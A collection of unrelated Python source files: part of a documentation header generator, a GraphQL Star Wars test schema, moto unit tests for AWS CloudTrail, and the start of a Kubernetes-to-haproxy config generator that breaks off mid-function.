desc = 'Generate headers with the definitions of a Getting Started guide'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
'--src',
dest='src',
default='doc/getting_started.qbk',
help='The .qbk source of the Getting Started guide'
)
parser.add_argument(
'--dst',
dest='dst',
default='example/getting_started',
help='The target directory to generate into (all headers in that directory will be deleted!)'
)
args = parser.parse_args()
qbk = open(args.src, 'r').readlines()
delete_old_headers(args.dst)
doc_dir = os.path.dirname(args.src)
(sections, defs) = parse_md(qbk)
files1 = gen_headers(sections, defs, args.dst)
(files2, qbk) = what_we_have_so_far_docs(doc_dir, qbk, defs, sections)
(files3, qbk) = \
extract_code_snippets(
qbk,
args.src[:-4] if args.src.endswith('.qbk') else args.src
)
write_files(files1)
write_files(files2)
write_files(files3)
write_file(args.src, ''.join(qbk))
if __name__ == "__main__":
main()
|
|
import asyncio
from graphql import (
GraphQLArgument,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLField,
GraphQLInputField,
GraphQLInputObjectType,
GraphQLInt,
GraphQLInterfaceType,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLSchema,
GraphQLString,
get_introspection_query,
graphql_sync,
print_schema,
)
from .fixtures import (
create_review,
get_characters,
get_droid,
get_friends,
get_hero_async,
get_human,
reviews,
)
episode_enum = GraphQLEnumType(
"Episode",
{
"NEWHOPE": GraphQLEnumValue(4, description="Released in 1977.",),
"EMPIRE": GraphQLEnumValue(5, description="Released in 1980.",),
"JEDI": GraphQLEnumValue(6, description="Released in 1983.",),
},
description="One of the films in the Star Wars Trilogy",
)
human_type: GraphQLObjectType
droid_type: GraphQLObjectType
character_interface = GraphQLInterfaceType(
"Character",
lambda: {
"id": GraphQLField(
GraphQLNonNull(GraphQLString), description="The id of the character."
),
"name": GraphQLField(GraphQLString, description="The name of the character."),
"friends": GraphQLField(
GraphQLList(character_interface), # type: ignore
description="The friends of the character,"
" or an empty list if they have none.",
),
"appearsIn": GraphQLField(
GraphQLList(episode_enum), description="Which movies they appear in."
),
},
resolve_type=lambda character, _info, _type: {
"Human": human_type.name,
"Droid": droid_type.name,
}[character.type],
description="A character in the Star Wars Trilogy",
)
human_type = GraphQLObjectType(
"Human",
lambda: {
"id": GraphQLField(
GraphQLNonNull(GraphQLString), description="The id of the human.",
),
"name": GraphQLField(GraphQLString, description="The name of the human.",),
"friends": GraphQLField(
GraphQLList(character_interface),
description="The friends of the human, or an empty list if they have none.",
resolve=lambda human, _info: get_friends(human),
),
"appearsIn": GraphQLField(
GraphQLList(episode_enum), description="Which movies they appear in.",
),
"homePlanet": GraphQLField(
GraphQLString,
description="The home planet of the human, or null if unknown.",
),
},
interfaces=[character_interface],
description="A humanoid creature in the Star Wars universe.",
)
droid_type = GraphQLObjectType(
"Droid",
lambda: {
"id": GraphQLField(
GraphQLNonNull(GraphQLString), description="The id of the droid.",
),
"name": GraphQLField(GraphQLString, description="The name of the droid.",),
"friends": GraphQLField(
GraphQLList(character_interface),
description="The friends of the droid, or an empty list if they have none.",
resolve=lambda droid, _info: get_friends(droid),
),
"appearsIn": GraphQLField(
GraphQLList(episode_enum), description="Which movies they appear in.",
),
"primaryFunction": GraphQLField(
GraphQLString, description="The primary function of the droid.",
),
},
interfaces=[character_interface],
description="A mechanical creature in the Star Wars universe.",
)
review_type = GraphQLObjectType(
"Review",
lambda: {
"episode": GraphQLField(episode_enum, description="The movie"),
"stars": GraphQLField(
GraphQLNonNull(GraphQLInt),
description="The number of stars this review gave, 1-5",
),
"commentary": GraphQLField(
GraphQLString, description="Comment about the movie"
),
},
description="Represents a review for a movie",
)
review_input_type = GraphQLInputObjectType(
"ReviewInput",
lambda: {
"stars": GraphQLInputField(GraphQLInt, description="0-5 stars"),
"commentary": GraphQLInputField(
GraphQLString, description="Comment about the movie, optional"
),
},
description="The input object sent when someone is creating a new review",
)
query_type = GraphQLObjectType(
"Query",
lambda: {
"hero": GraphQLField(
character_interface,
args={
"episode": GraphQLArgument(
episode_enum,
description="If omitted, returns the hero of the whole saga. If "
"provided, returns the hero of that particular episode.",
)
},
resolve=lambda _souce, _info, episode=None: get_hero_async(episode),
),
"human": GraphQLField(
human_type,
args={
"id": GraphQLArgument(
description="id of the human", type_=GraphQLNonNull(GraphQLString),
)
},
resolve=lambda _souce, _info, id: get_human(id),
),
"droid": GraphQLField(
droid_type,
args={
"id": GraphQLArgument(
description="id of the droid", type_=GraphQLNonNull(GraphQLString),
)
},
resolve=lambda _source, _info, id: get_droid(id),
),
"characters": GraphQLField(
GraphQLList(character_interface),
args={
"ids": GraphQLArgument(
GraphQLList(GraphQLString), description="list of character ids",
)
},
resolve=lambda _source, _info, ids=None: get_characters(ids),
),
},
)
mutation_type = GraphQLObjectType(
"Mutation",
lambda: {
"createReview": GraphQLField(
review_type,
args={
"episode": GraphQLArgument(
episode_enum, description="Episode to create review",
),
"review": GraphQLArgument(
description="set alive status", type_=review_input_type,
),
},
resolve=lambda _source, _info, episode=None, review=None: create_review(
episode, review
),
),
},
description="The mutation type, represents all updates we can make to our data",
)
async def subscribe_reviews(_root, _info, episode):
for review in reviews[episode]:
yield review
await asyncio.sleep(0.1)
async def resolve_review(review, _info, **_args):
return review
subscription_type = GraphQLObjectType(
"Subscription",
lambda: {
"reviewAdded": GraphQLField(
review_type,
args={
"episode": GraphQLArgument(
episode_enum, description="Episode to review",
)
},
subscribe=subscribe_reviews,
resolve=resolve_review,
)
},
)
StarWarsSchema = GraphQLSchema(
query=query_type,
mutation=mutation_type,
subscription=subscription_type,
types=[human_type, droid_type, review_type, review_input_type],
)
StarWarsIntrospection = graphql_sync(StarWarsSchema, get_introspection_query()).data
StarWarsTypeDef = print_schema(StarWarsSchema)
|
|
"""Unit tests for cloudtrail-supported APIs."""
import boto3
import pytest
import sure # noqa # pylint: disable=unused-import
from botocore.exceptions import ClientError
from datetime import datetime
from moto import mock_cloudtrail, mock_s3, mock_sns
from moto.core import ACCOUNT_ID
from uuid import uuid4
@mock_s3
@mock_cloudtrail
def test_create_trail_without_bucket():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.create_trail(
Name="mytrailname", S3BucketName="specificweirdbucketthatdoesnotexist"
)
err = exc.value.response["Error"]
err["Code"].should.equal("S3BucketDoesNotExistException")
err["Message"].should.equal(
"S3 bucket specificweirdbucketthatdoesnotexist does not exist!"
)
@pytest.mark.parametrize(
"name,message",
[
(
"a",
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 1 characters.",
),
(
"aa",
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 2 characters.",
),
(
"a" * 129,
"Trail name too long. Maximum allowed length: 128 characters. Specified name length: 129 characters.",
),
("trail!", "Trail name must ends with a letter or number."),
(
"my#trail",
"Trail name or ARN can only contain uppercase letters, lowercase letters, numbers, periods (.), hyphens (-), and underscores (_).",
),
("-trail", "Trail name must starts with a letter or number."),
],
)
@mock_cloudtrail
def test_create_trail_invalid_name(name, message):
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.create_trail(
Name=name, S3BucketName="specificweirdbucketthatdoesnotexist"
)
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidTrailNameException")
err["Message"].should.equal(message)
@mock_cloudtrail
@mock_s3
def test_create_trail_simple():
bucket_name, resp, trail_name = create_trail_simple()
resp.should.have.key("Name").equal(trail_name)
resp.should.have.key("S3BucketName").equal(bucket_name)
resp.shouldnt.have.key("S3KeyPrefix")
resp.shouldnt.have.key("SnsTopicName")
resp.shouldnt.have.key("SnsTopicARN")
resp.should.have.key("IncludeGlobalServiceEvents").equal(True)
resp.should.have.key("IsMultiRegionTrail").equal(False)
resp.should.have.key("TrailARN").equal(
f"arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/{trail_name}"
)
resp.should.have.key("LogFileValidationEnabled").equal(False)
resp.should.have.key("IsOrganizationTrail").equal(False)
return resp
def create_trail_simple(region_name="us-east-1"):
client = boto3.client("cloudtrail", region_name=region_name)
s3 = boto3.client("s3", region_name="us-east-1")
bucket_name = str(uuid4())
s3.create_bucket(Bucket=bucket_name)
trail_name = str(uuid4())
resp = client.create_trail(Name=trail_name, S3BucketName=bucket_name)
return bucket_name, resp, trail_name
@mock_cloudtrail
def test_create_trail_multi_but_not_global():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.create_trail(
Name="mytrailname",
S3BucketName="non-existent",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=True,
)
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidParameterCombinationException")
# Note that this validation occurs before the S3 bucket is validated
err["Message"].should.equal(
"Multi-Region trail must include global service events."
)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_create_trail_with_nonexisting_topic():
client = boto3.client("cloudtrail", region_name="us-east-1")
s3 = boto3.client("s3", region_name="us-east-1")
bucket_name = str(uuid4())
s3.create_bucket(Bucket=bucket_name)
with pytest.raises(ClientError) as exc:
client.create_trail(
Name="mytrailname",
S3BucketName=bucket_name,
SnsTopicName="nonexistingtopic",
)
err = exc.value.response["Error"]
err["Code"].should.equal("InsufficientSnsTopicPolicyException")
err["Message"].should.equal(
"SNS Topic does not exist or the topic policy is incorrect!"
)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_create_trail_advanced():
bucket_name, resp, sns_topic_name, trail_name = create_trail_advanced()
resp.should.have.key("Name").equal(trail_name)
resp.should.have.key("S3BucketName").equal(bucket_name)
resp.should.have.key("S3KeyPrefix").equal("s3kp")
resp.should.have.key("SnsTopicName").equal(sns_topic_name)
resp.should.have.key("SnsTopicARN").equal(
f"arn:aws:sns:us-east-1:{ACCOUNT_ID}:{sns_topic_name}"
)
resp.should.have.key("IncludeGlobalServiceEvents").equal(True)
resp.should.have.key("IsMultiRegionTrail").equal(True)
resp.should.have.key("TrailARN").equal(
f"arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/{trail_name}"
)
resp.should.have.key("LogFileValidationEnabled").equal(True)
resp.should.have.key("IsOrganizationTrail").equal(True)
resp.should.have.key("CloudWatchLogsLogGroupArn").equals("cwllga")
resp.should.have.key("CloudWatchLogsRoleArn").equals("cwlra")
resp.should.have.key("KmsKeyId").equals("kki")
def create_trail_advanced(region_name="us-east-1"):
client = boto3.client("cloudtrail", region_name=region_name)
s3 = boto3.client("s3", region_name="us-east-1")
sns = boto3.client("sns", region_name=region_name)
bucket_name = str(uuid4())
s3.create_bucket(Bucket=bucket_name)
sns_topic_name = "cloudtrailtopic"
sns.create_topic(Name=sns_topic_name)
trail_name = str(uuid4())
resp = client.create_trail(
Name=trail_name,
S3BucketName=bucket_name,
S3KeyPrefix="s3kp",
SnsTopicName=sns_topic_name,
IncludeGlobalServiceEvents=True,
IsMultiRegionTrail=True,
EnableLogFileValidation=True,
IsOrganizationTrail=True,
CloudWatchLogsLogGroupArn="cwllga",
CloudWatchLogsRoleArn="cwlra",
KmsKeyId="kki",
TagsList=[{"Key": "tk", "Value": "tv"}, {"Key": "tk2", "Value": "tv2"}],
)
return bucket_name, resp, sns_topic_name, trail_name
@mock_cloudtrail
def test_get_trail_with_one_char():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail(Name="?")
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidTrailNameException")
err["Message"].should.equal(
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 1 characters."
)
@mock_cloudtrail
def test_get_trail_unknown():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail(Name="unknowntrail")
err = exc.value.response["Error"]
err["Code"].should.equal("TrailNotFoundException")
err["Message"].should.equal(
f"Unknown trail: unknowntrail for the user: {ACCOUNT_ID}"
)
@mock_cloudtrail
def test_get_trail():
test_create_trail_simple()
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, name = create_trail_simple()
trail = client.get_trail(Name=name)["Trail"]
trail.should.have.key("Name").equal(name)
trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
trail.should.have.key("IsMultiRegionTrail").equal(False)
trail.should.have.key("TrailARN").equal(
f"arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/{name}"
)
@mock_cloudtrail
def test_get_trail_status_with_one_char():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail_status(Name="?")
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidTrailNameException")
err["Message"].should.equal(
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 1 characters."
)
@mock_cloudtrail
def test_get_trail_status_unknown_trail():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail_status(Name="unknowntrail")
err = exc.value.response["Error"]
err["Code"].should.equal("TrailNotFoundException")
err["Message"].should.equal(
f"Unknown trail: arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/unknowntrail for the user: {ACCOUNT_ID}"
)
@mock_cloudtrail
@mock_s3
def test_get_trail_status_inactive():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, trail_name = create_trail_simple()
status = client.get_trail_status(Name=trail_name)
status.should.have.key("IsLogging").equal(False)
status.should.have.key("LatestDeliveryAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key("LatestDeliveryAttemptSucceeded").equal("")
status.should.have.key("TimeLoggingStarted").equal("")
status.should.have.key("TimeLoggingStopped").equal("")
status.shouldnt.have.key("StartLoggingTime")
@mock_cloudtrail
@mock_s3
def test_get_trail_status_arn_inactive():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, resp, _ = create_trail_simple()
status = client.get_trail_status(Name=resp["TrailARN"])
status.should.have.key("IsLogging").equal(False)
status.should.have.key("LatestDeliveryAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key("LatestDeliveryAttemptSucceeded").equal("")
status.should.have.key("TimeLoggingStarted").equal("")
status.should.have.key("TimeLoggingStopped").equal("")
status.shouldnt.have.key("StartLoggingTime")
@mock_cloudtrail
@mock_s3
def test_get_trail_status_after_starting():
client = boto3.client("cloudtrail", region_name="eu-west-3")
_, _, trail_name = create_trail_simple(region_name="eu-west-3")
client.start_logging(Name=trail_name)
status = client.get_trail_status(Name=trail_name)
status.should.have.key("IsLogging").equal(True)
status.should.have.key("LatestDeliveryTime").be.a(datetime)
status.should.have.key("StartLoggingTime").be.a(datetime)
status.should.have.key(
"LatestDeliveryAttemptTime"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key(
"LatestDeliveryAttemptSucceeded"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("TimeLoggingStarted") # .equal("2021-10-13T15:02:21Z")
status.should.have.key("TimeLoggingStopped").equal("")
status.shouldnt.have.key("StopLoggingTime")
@mock_cloudtrail
@mock_s3
def test_get_trail_status_after_starting_and_stopping():
client = boto3.client("cloudtrail", region_name="eu-west-3")
_, _, trail_name = create_trail_simple(region_name="eu-west-3")
client.start_logging(Name=trail_name)
client.stop_logging(Name=trail_name)
status = client.get_trail_status(Name=trail_name)
status.should.have.key("IsLogging").equal(False)
status.should.have.key("LatestDeliveryTime").be.a(datetime)
status.should.have.key("StartLoggingTime").be.a(datetime)
status.should.have.key("StopLoggingTime").be.a(datetime)
status.should.have.key(
"LatestDeliveryAttemptTime"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key(
"LatestDeliveryAttemptSucceeded"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("TimeLoggingStarted") # .equal("2021-10-13T15:02:21Z")
status.should.have.key("TimeLoggingStopped") # .equal("2021-10-13T15:03:21Z")
@mock_cloudtrail
@mock_s3
@mock_sns
def test_list_trails():
client = boto3.client("cloudtrail", region_name="eu-west-3")
_, trail1, _ = create_trail_simple()
_, trail2, _, _ = create_trail_advanced(region_name="ap-southeast-2")
_, trail3, _ = create_trail_simple(region_name="eu-west-1")
all_trails = client.list_trails()["Trails"]
all_trails.should.have.length_of(3)
all_trails.should.contain(
{
"TrailARN": trail1["TrailARN"],
"Name": trail1["Name"],
"HomeRegion": "us-east-1",
}
)
all_trails.should.contain(
{
"TrailARN": trail2["TrailARN"],
"Name": trail2["Name"],
"HomeRegion": "ap-southeast-2",
}
)
all_trails.should.contain(
{
"TrailARN": trail3["TrailARN"],
"Name": trail3["Name"],
"HomeRegion": "eu-west-1",
}
)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_describe_trails_without_shadowtrails():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, trail1, _ = create_trail_simple()
_, trail2, _, _ = create_trail_advanced()
_, trail3, _ = create_trail_simple(region_name="eu-west-1")
trails = client.describe_trails()["trailList"]
trails.should.have.length_of(3)
first_trail = [t for t in trails if t["Name"] == trail1["Name"]][0]
first_trail.should.have.key("Name").equal(trail1["Name"])
first_trail.should.have.key("S3BucketName").equal(trail1["S3BucketName"])
first_trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
first_trail.should.have.key("IsMultiRegionTrail").equal(False)
first_trail.should.have.key("HomeRegion").equal("us-east-1")
first_trail.should.have.key("LogFileValidationEnabled").equal(False)
first_trail.should.have.key("HasCustomEventSelectors").equal(False)
first_trail.should.have.key("HasInsightSelectors").equal(False)
first_trail.should.have.key("IsOrganizationTrail").equal(False)
first_trail.shouldnt.have.key("S3KeyPrefix")
first_trail.shouldnt.have.key("SnsTopicName")
first_trail.shouldnt.have.key("SnsTopicARN")
second_trail = [t for t in trails if t["Name"] == trail2["Name"]][0]
second_trail.should.have.key("Name").equal(trail2["Name"])
second_trail.should.have.key("S3BucketName").equal(trail2["S3BucketName"])
second_trail.should.have.key("S3KeyPrefix").equal(trail2["S3KeyPrefix"])
second_trail.should.have.key("SnsTopicName").equal(trail2["SnsTopicName"])
second_trail.should.have.key("SnsTopicARN").equal(trail2["SnsTopicARN"])
second_trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
second_trail.should.have.key("IsMultiRegionTrail").equal(True)
second_trail.should.have.key("HomeRegion").equal("us-east-1")
second_trail.should.have.key("LogFileValidationEnabled").equal(True)
second_trail.should.have.key("HasCustomEventSelectors").equal(False)
second_trail.should.have.key("HasInsightSelectors").equal(False)
second_trail.should.have.key("IsOrganizationTrail").equal(True)
third_trail = [t for t in trails if t["Name"] == trail3["Name"]][0]
third_trail.should.have.key("Name").equal(trail3["Name"])
third_trail.should.have.key("S3BucketName").equal(trail3["S3BucketName"])
third_trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
third_trail.should.have.key("IsMultiRegionTrail").equal(False)
third_trail.should.have.key("HomeRegion").equal("eu-west-1")
third_trail.should.have.key("LogFileValidationEnabled").equal(False)
third_trail.should.have.key("HasCustomEventSelectors").equal(False)
third_trail.should.have.key("HasInsightSelectors").equal(False)
third_trail.should.have.key("IsOrganizationTrail").equal(False)
third_trail.shouldnt.have.key("S3KeyPrefix")
third_trail.shouldnt.have.key("SnsTopicName")
third_trail.shouldnt.have.key("SnsTopicARN")
@mock_cloudtrail
@mock_s3
@mock_sns
def test_describe_trails_with_shadowtrails_true():
# Same behaviour as if shadowtrails-parameter was not supplied
client = boto3.client("cloudtrail", region_name="us-east-1")
create_trail_simple()
create_trail_advanced()
create_trail_simple(region_name="eu-west-1")
trails = client.describe_trails(includeShadowTrails=True)["trailList"]
trails.should.have.length_of(3)
eu_client = boto3.client("cloudtrail", region_name="eu-west-1")
trails = eu_client.describe_trails(includeShadowTrails=True)["trailList"]
trails.should.have.length_of(3)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_describe_trails_with_shadowtrails_false():
# Only trails for the current region should now be returned
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, name1 = create_trail_simple()
_, _, _, name2 = create_trail_advanced()
_, _, name3 = create_trail_simple(region_name="eu-west-1")
trails = client.describe_trails(includeShadowTrails=False)["trailList"]
trails.should.have.length_of(2)
[t["Name"] for t in trails].should.equal([name1, name2])
eu_client = boto3.client("cloudtrail", region_name="eu-west-1")
trails = eu_client.describe_trails(includeShadowTrails=False)["trailList"]
trails.should.have.length_of(1)
[t["Name"] for t in trails].should.equal([name3])
@mock_cloudtrail
@mock_s3
def test_delete_trail():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, name = create_trail_simple()
trails = client.describe_trails()["trailList"]
trails.should.have.length_of(1)
client.delete_trail(Name=name)
trails = client.describe_trails()["trailList"]
trails.should.have.length_of(0)
@mock_cloudtrail
@mock_s3
def test_update_trail_simple():
client = boto3.client("cloudtrail", region_name="ap-southeast-2")
bucket_name, trail, name = create_trail_simple(region_name="ap-southeast-2")
resp = client.update_trail(Name=name)
resp.should.have.key("Name").equal(name)
resp.should.have.key("S3BucketName").equal(bucket_name)
resp.should.have.key("IncludeGlobalServiceEvents").equal(True)
resp.should.have.key("IsMultiRegionTrail").equal(False)
resp.should.have.key("LogFileValidationEnabled").equal(False)
resp.should.have.key("IsOrganizationTrail").equal(False)
resp.shouldnt.have.key("S3KeyPrefix")
resp.shouldnt.have.key("SnsTopicName")
resp.shouldnt.have.key("SnsTopicARN")
trail = client.get_trail(Name=name)["Trail"]
trail.should.have.key("Name").equal(name)
trail.should.have.key("S3BucketName").equal(bucket_name)
trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
trail.should.have.key("IsMultiRegionTrail").equal(False)
trail.should.have.key("LogFileValidationEnabled").equal(False)
trail.should.have.key("IsOrganizationTrail").equal(False)
trail.shouldnt.have.key("S3KeyPrefix")
trail.shouldnt.have.key("SnsTopicName")
trail.shouldnt.have.key("SnsTopicARN")
@mock_cloudtrail
@mock_s3
def test_update_trail_full():
client = boto3.client("cloudtrail", region_name="ap-southeast-1")
_, trail, name = create_trail_simple(region_name="ap-southeast-1")
resp = client.update_trail(
Name=name,
S3BucketName="updated_bucket",
S3KeyPrefix="s3kp",
SnsTopicName="stn",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=True,
EnableLogFileValidation=True,
CloudWatchLogsLogGroupArn="cwllga",
CloudWatchLogsRoleArn="cwlra",
KmsKeyId="kki",
IsOrganizationTrail=True,
)
resp.should.have.key("Name").equal(name)
resp.should.have.key("S3BucketName").equal("updated_bucket")
resp.should.have.key("S3KeyPrefix").equals("s3kp")
resp.should.have.key("SnsTopicName").equals("stn")
resp.should.have.key("IncludeGlobalServiceEvents").equal(False)
resp.should.have.key("IsMultiRegionTrail").equal(True)
resp.should.have.key("LogFileValidationEnabled").equal(True)
resp.should.have.key("IsOrganizationTrail").equal(True)
trail = client.get_trail(Name=name)["Trail"]
trail.should.have.key("Name").equal(name)
trail.should.have.key("S3BucketName").equal("updated_bucket")
trail.should.have.key("S3KeyPrefix").equals("s3kp")
trail.should.have.key("SnsTopicName").equals("stn")
trail.should.have.key("IncludeGlobalServiceEvents").equal(False)
trail.should.have.key("IsMultiRegionTrail").equal(True)
trail.should.have.key("LogFileValidationEnabled").equal(True)
trail.should.have.key("IsOrganizationTrail").equal(True)
trail.should.have.key("CloudWatchLogsLogGroupArn").equals("cwllga")
trail.should.have.key("CloudWatchLogsRoleArn").equals("cwlra")
trail.should.have.key("KmsKeyId").equals("kki")
|
|
#!/usr/bin/python3
'''
Gathers endpoints for services from kubernetes-api and generates a haproxy.cfg from it.
Since not all endpoints should always be exposed, the endpoints have to be annotated to
be considered for haproxy-config generation. The required keywords are
domain - The domain-name under which the service is made avaliable. Can be any string you desire.
proto - The protocol to expose the service with. All endpoints with proto=http go in the same
haproxy-frontend which forwards requests by HTTP-HOST-Header information to the correspoding
haproxy-http-backend.
The same applies to proto=https, except that requests are forwarded by SSL-SNI-Header
to the respective https-haproxy-backend.
If proto is set to anything else, for example 'redis', the/a template needs to extract that
endpoints info manually. See Readme.md for a more detailed explanation.
'''
# We are fine with lower case constants
# pylint: disable=invalid-name
# pylint: disable=missing-docstring
import os
import sys
import logging
import datetime
import argparse
import random
import string
import subprocess
import shutil
import time
from hashlib import md5 as hashmd5
from jinja2 import Environment
from jinja2 import FileSystemLoader
import simplejson
import requests
log = None
class ParseCAAction(argparse.Action):
'''
Helper class to support ssl-ca=<string> and --ssl-ca=False
simultaniously.
'''
def __call__(self, parser, namespace, values, option_string=None):
if values == 'False':
setattr(namespace, self.dest, False)
else:
setattr(namespace, self.dest, values)
class ArgParser(object):
'''
Parse commandline arguments.
'''
def __init__(self):
self.main_parser = argparse.ArgumentParser()
self.add_args()
def add_args(self):
'''
Add options to argparse instance
'''
self.main_parser.add_argument(
'--log-level',
type=str,
default='INFO',
dest='loglevel',
nargs='?',
required=False,
help='The loglevel of the logger'
)
self.main_parser.add_argument(
'--ignore-proxy-env',
type=bool,
default=True,
const=True,
dest='ignore_proxy_env',
nargs='?',
required=False,
help=(
'Whether to ignore http_proxy / https_proxy settings '
'from environemnt (default: True)'
)
)
self.main_parser.add_argument(
'--ssl-key',
type=str,
default=None,
dest='ssl_key_file',
nargs='?',
required=False,
help='The SSL-client-key-file to use (default: None)'
)
self.main_parser.add_argument(
'--ssl-cert',
type=str,
default=None,
dest='ssl_cert_file',
nargs='?',
required=False,
help='The SSL-client-cert-file to use (default: None)'
)
self.main_parser.add_argument(
'--interval',
type=int,
default=30,
dest='refresh_interval',
nargs='?',
required=False,
help=(
'The interval at which to check changes in '
'the endpoints (default: 30)'
)
)
self.main_parser.add_argument(
'--ssl-ca',
type=str,
default='/etc/pyconfd/ca.pem',
dest='ssl_ca_file',
nargs='?',
required=False,
action=ParseCAAction,
help=(
'The SSL-ca-file to check the api-servers '
'certificate (default: /etc/pyconfd/ca.pem)'
)
)
self.main_parser.add_argument(
'--template-dir',
type=str,
default='/etc/pyconfd/',
dest='template_dir',
nargs='?',
required=False,
help='Where to find the template files (default: /etc/pyconfd)'
)
self.main_parser.add_argument(
'--haproxy-conf',
type=str,
default='/etc/haproxy/haproxy.cfg',
dest='haproxy_conf',
nargs='?',
required=False,
help=(
'The full path where to put the generated haproxy '
'config (default: /etc/haproxy/haproxy.cfg)'
)
)
self.main_parser.add_argument(
'--api-servers',
type=str,
default='',
dest='apiservers',
nargs='?',
required=True,
help=(
'List of api-server urls like https://<ip>:<port>, '
'they are tried in order (default: [])'
)
)
self.main_parser.add_argument(
'--haproxy-chk-cmd',
type=str,
default='/usr/sbin/haproxy -c -q -f',
dest='haproxy_check_cmd',
nargs='?',
required=False,
help=(
'The command to check the syntax of a haproxy '
'config (default: /usr/sbin/haproxy -c -q -f)'
)
)
self.main_parser.add_argument(
'--haproxy-reload-cmd',
type=str,
default='/etc/init.d/haproxy reload',
dest='haproxy_reload_cmd',
nargs='?',
required=False,
help=(
'The command to reload/restart haproxy '
'(default: /bin/systemctl reload-or-restart haproxy)'
)
)
def parse_args(self):
return self.main_parser.parse_args()
class MyLogger(object):
'''
Basic logging class for easy logging to the console
'''
def __init__(self, level=logging.INFO):
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.getLevelName(level.upper()))
ch_format = logging.Formatter('%(levelname)s - %(message)s')
conh = logging.StreamHandler()
conh.setFormatter(ch_format)
conh.setLevel(logging.getLevelName(level.upper()))
self.logger.addHandler(conh)
def info(self, msg):
self.logger.info(msg)
def error(self, msg):
self.logger.error(msg)
def debug(self, msg):
self.logger.debug(msg)
def load_tmpls(conf):
'''
Load all templates (files named *.tmpl) from configured
template dir and return jinja-environment
'''
log.info('Loading templates *.tmpl from {0}'.format(conf['template_dir']))
j2tmpls = Environment(
loader=FileSystemLoader(conf['template_dir']),
trim_blocks=True)
return j2tmpls
def md5(fname):
hash_md5 = hashmd5()
with open(fname, "rb") as md5f:
for chunk in iter(lambda: md5f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def writeconf(conf, data):
'''
Write the generated data to a temporary file and run syntax checks
on it. If successful, the temporary file is moved to its destination
and the haproxy service is reloaded via systemctl
'''
# Generate a random string for temporary config
tmp_name = '/tmp/haproxy.cfg.' + ''.join(
random.choice(string.ascii_uppercase) for _ in range(5))
try:
with open(tmp_name, 'w') as tmp_f:
tmp_f.write(''.join(data))
log.debug('Wrote temporary config to {0}'.format(tmp_name))
except (IOError, OSError) as w_err:
log.error('Failed to write generated config: {0}'.format(str(w_err)))
cmd = conf['haproxy_check_cmd'] + ' ' + tmp_name
log.debug('Executing syntax check: {0}'.format(cmd))
if subprocess.call(cmd.split()) == 0:
log.info('Syntax-check of temporary config at {0} successful'.format(tmp_name))
md5_inst_conf = md5(conf['haproxy_conf'])
md5_tmp_name = md5(tmp_name)
log.debug(
'md5sums {0}: {1}, {2}: {3}'.format(
conf['haproxy_conf'],
md5_inst_conf,
tmp_name,
md5_tmp_name
)
)
if md5_inst_conf == md5_tmp_name:
log.info('No changes in endpoints found, skipping installation of {0}'.format(tmp_name))
os.remove(tmp_name)
else:
log.info('Installing {0} config to {1}'.format(tmp_name, conf['haproxy_conf']))
shutil.move(tmp_name, conf['haproxy_conf'])
log.debug('Executing haproxy reload: {0}'.format(conf['haproxy_reload_cmd']))
if subprocess.call(conf['haproxy_reload_cmd'].split()) == 0:
log.info('Successfully reloaded haproxy!')
else:
log.error('Failed to reload haproxy via systemctl!')
else:
msg = 'Syntax-check of temporary config at {0} failed, aborting...'
raise SyntaxError(msg.format(tmp_name))
def gen(svc_map=None, conf=None, extra=None, j2_map=None):
'''
